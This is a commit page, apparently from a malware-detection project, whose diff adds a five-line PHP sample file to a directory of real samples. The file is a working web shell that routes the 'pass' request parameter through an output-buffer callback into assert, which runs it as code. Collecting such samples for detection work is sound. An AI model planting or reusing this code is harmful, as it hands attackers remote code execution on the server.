diff options
| author | Mathieu Deous | 2022-05-02 20:18:23 +0200 |
|---|---|---|
| committer | GitHub | 2022-05-02 20:18:23 +0200 |
| commit | 48936efa96ae17295be4e0a71be3294f0ec6aef8 (patch) | |
| tree | f4e69551f1368aa048edf46b7b061600f3668329 /data/samples/real/srt.php | |
| parent | bbc738e16f8b637afde58d65196374af98a5e0e2 (diff) | |
Make application go-install-able and create a docker image
Diffstat (limited to 'data/samples/real/srt.php')
| -rw-r--r-- | data/samples/real/srt.php | 5 |
1 files changed, 5 insertions, 0 deletions
diff --git a/data/samples/real/srt.php b/data/samples/real/srt.php new file mode 100644 index 0000000..ef02af2 --- /dev/null +++ b/data/samples/real/srt.php | |||
| @@ -0,0 +1,5 @@ | |||
| 1 | <?php | ||
| 2 | ob_start(function ($c,$d){register_shutdown_function('assert',$c);}); | ||
| 3 | echo $_REQUEST['pass']; | ||
| 4 | ob_end_flush(); | ||
| 5 | ?> | ||
